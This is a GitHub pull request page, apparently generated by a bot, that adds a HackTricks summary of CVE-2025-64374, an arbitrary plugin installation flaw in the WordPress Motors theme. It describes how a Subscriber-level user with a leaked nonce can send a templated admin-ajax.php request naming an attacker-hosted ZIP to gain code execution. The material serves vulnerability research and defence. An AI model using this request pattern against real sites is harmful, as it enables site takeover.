Critical Arbitrary File Upload Vulnerability in Motors Theme... #1694
+56
−0
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
🤖 Automated Content Update
This PR was automatically generated by the HackTricks News Bot based on a technical blog post.
📝 Source Information
🎯 Content Summary
This article analyzes a critical Subscriber+ arbitrary file upload / arbitrary plugin installation vulnerability in the WordPress Motors theme affecting over 20,000 sites. The bug affects versions 5.6.81 and below and is tracked as CVE-2025-64374 with a CVSS score of 9.9. Exploitation allows any authenticated user with Subscriber or higher role to install and activate arbitrary plugins from attacker-controlled URLs, enabling upload and execution of ma...
🔧 Technical Details
Trick: Turning weakly protected WordPress AJAX plugin installers into RCE
This article illustrates a general exploitation pattern for WordPress components that expose plugin/theme installation over AJAX. If an authenticated AJAX endpoint (e.g.
wp_ajax_some_install_action) usescheck_ajax_referer()but does not enforce capabilities viacurrent_user_can(), and it takes a user-controlled URL that is passed intoPlugin_Upgrader::install(), then any low-privileged user who can obtain the nonce can escalate to code execution. The attacker logs in, views a page that embeds the nonce, copies it, and crafts a direct request to/wp-admin/admin-ajax.phpwith:action=<ajax_action>&nonce=<leaked_nonce>&plugin=<attacker_zip_url>.The target downloads and installs the remote ZIP as a plugin, then activates it (either via custom activation logic or WordPress APIs), ex...
🤖 Agent Actions
Summary:
wp_ajax_mvl_theme_install_baseinstaller can be abused by Subscriber-level users to deploy and activate arbitrary plugins, including exploitation steps, sample request, detection heuristics, and hardening guidance tied to the 5.6.82 patch.Testing:
This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.
📚 Repository Maintenance
All .md files have been checked for proper formatting (headers, includes, etc.).